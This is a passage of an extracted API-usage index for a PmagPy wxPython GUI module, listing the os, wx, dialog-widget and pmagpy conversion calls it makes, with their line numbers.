"usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2303, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2303, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 2305, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2305, "usage_type": 
"attribute"}, {"api_name": "os.chdir", "line_number": 2334, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2343, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2343, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2349, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2349, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2352, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2352, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_txt", "line_number": 2361, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2361, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2364, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2366, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2366, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.jr6_jr6", "line_number": 2368, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2368, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2371, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2373, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_jr6", "line_number": 2377, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2377, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2380, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2380, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2382, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2382, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2396, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2396, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic.do_help", "line_number": 2396, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_txt_magic", "line_number": 2396, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2398, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2398, "usage_type": "name"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic.do_help", "line_number": 2398, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.jr6_jr6_magic", "line_number": 2398, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2401, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2407, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 2407, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2408, "usage_type": "call"}, {"api_name": "wx.BoxSizer", 
"line_number": 2417, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2417, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2418, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2418, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2421, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2421, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2424, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2424, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2427, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2427, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2430, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2430, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2434, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2434, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2438, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2438, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2442, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2442, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2445, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2445, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2449, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2449, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2453, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2453, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2457, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2457, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2460, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2461, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2462, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2463, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2464, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2465, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2466, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2467, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2468, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2468, "usage_type": 
"attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2469, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2472, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2475, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2475, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2489, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2489, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2492, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 2497, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2497, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2538, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2538, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 2547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2547, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2562, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2562, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2569, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2569, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2572, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2572, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2574, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2574, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2581, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2581, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.bgc", "line_number": 2581, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2581, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2599, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2599, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2600, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2600, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 2606, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2606, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 2609, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2609, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 2613, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2613, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 2617, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2617, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 2620, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 2620, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 2623, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2623, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.check_box", "line_number": 2627, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2627, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 2630, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2630, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2634, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2634, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2637, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2637, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2640, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2641, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2642, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2643, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2644, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2645, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2646, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2647, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2647, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2648, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2649, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 2651, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 2651, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2652, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2655, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2655, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 2671, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2677, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2677, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 2679, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2679, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2736, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2736, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 2738, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 2738, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 2740, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2740, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2746, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2746, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.utrecht", "line_number": 2746, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 2746, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2750, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2758, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2758, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2759, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2759, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 2762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2762, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 2780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2780, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 2784, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2784, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2787, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 2788, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 2798, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2801, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2801, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 2814, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2814, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 2817, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.run_command_and_close_window", "line_number": 2819, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2819, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 2822, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 2822, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 2832, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 2834, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 2834, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2841, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 2842, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.ALWAYS_SHOW_SB", "line_number": 2842, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 2844, "usage_type": "call"}, {"api_name": "wx.SIMPLE_BORDER", "line_number": 2844, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 2859, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2859, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 2860, "usage_type": 
"call"}, {"api_name": "pmagpy.pmag", "line_number": 2860, "usage_type": "name"}, {"api_name": "wx.EVT_MENU", "line_number": 2867, "usage_type": "attribute"}, {"api_name": "pmagpy.mapping.map_magic.mapping", "line_number": 2913, "usage_type": "call"}, {"api_name": "pmagpy.mapping.map_magic", "line_number": 2913, "usage_type": "name"}, {"api_name": "pmagpy.mapping.map_magic.magic3_2_orient_magic_map", "line_number": 2913, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 2925, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 2925, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 2927, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 2928, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2928, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2929, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2929, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2930, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2931, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2931, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2932, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 2933, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 2933, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 2934, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2936, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 2937, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2939, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 2939, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2941, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2942, "usage_type": "attribute"}, {"api_name": "wx.CENTRE", "line_number": 2944, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 2945, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 2946, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 2946, "usage_type": "attribute"}, {"api_name": "sys.platform", "line_number": 2948, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 2953, "usage_type": "attribute"}, {"api_name": "dialogs.magic_grid2.MagicGrid", "line_number": 2983, "usage_type": "call"}, {"api_name": "dialogs.magic_grid2", "line_number": 2983, "usage_type": "name"}, {"api_name": "dialogs.drop_down_menus3.Menus", "line_number": 3042, "usage_type": "call"}, {"api_name": "dialogs.drop_down_menus3", "line_number": 3042, "usage_type": "name"}, {"api_name": "wx.grid", "line_number": 3043, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 3048, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 3076, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 3080, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3082, "usage_type": "attribute"}, {"api_name": "pmagpy.pmag.magic_read_dict", "line_number": 3085, "usage_type": "call"}, {"api_name": "pmagpy.pmag", "line_number": 
3085, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 3102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3102, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3118, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3118, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3133, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3154, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 3179, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3180, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3180, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 3182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3182, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 3182, "usage_type": "call"}, {"api_name": "pmagpy.ipmag.orientation_magic", "line_number": 3188, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 3188, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 3196, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3196, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3203, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3203, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3214, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.CANCEL", "line_number": 3214, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3216, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3222, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3229, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3240, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3241, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3241, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3247, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3247, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3250, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3250, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3253, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3256, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3259, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3262, "usage_type": "call"}, {"api_name": "wx.RadioButton", "line_number": 3265, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3272, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3272, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3273, 
"usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3273, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3276, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3276, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3277, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 3278, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3278, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3279, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3296, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3296, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3299, "usage_type": "call"}, {"api_name": "wx.RB_GROUP", "line_number": 3300, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 3303, "usage_type": "call"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3313, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 3313, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 3317, "usage_type": "call"}, {"api_name": "wx.CENTER", "line_number": 3317, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 3318, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 3319, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3328, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3328, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3329, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 3329, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3330, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 3332, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 3332, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 3333, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3353, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 3353, "usage_type": "attribute"}, {"api_name": "wx.ID_CANCEL", "line_number": 3370, "usage_type": "attribute"}, {"api_name": "wx.MessageDialog", "line_number": 3396, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ICON_INFORMATION", "line_number": 3396, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 3421, "usage_type": "attribute"}, {"api_name": "wx.Dialog", "line_number": 3425, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 3435, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 3436, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 3436, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3442, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3442, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3443, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3444, "usage_type": 
"call"}, {"api_name": "wx.CheckBox", "line_number": 3445, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3446, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3447, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3448, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3449, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3450, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3451, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3452, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3456, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 3462, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 3462, "usage_type": "attribute"}, {"api_name": "wx.CheckBox", "line_number": 3463, "usage_type": "call"}, {"api_name": "wx.CheckBox", "line_number": 3464, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 3466, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 3467, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 3473, "usage_type": 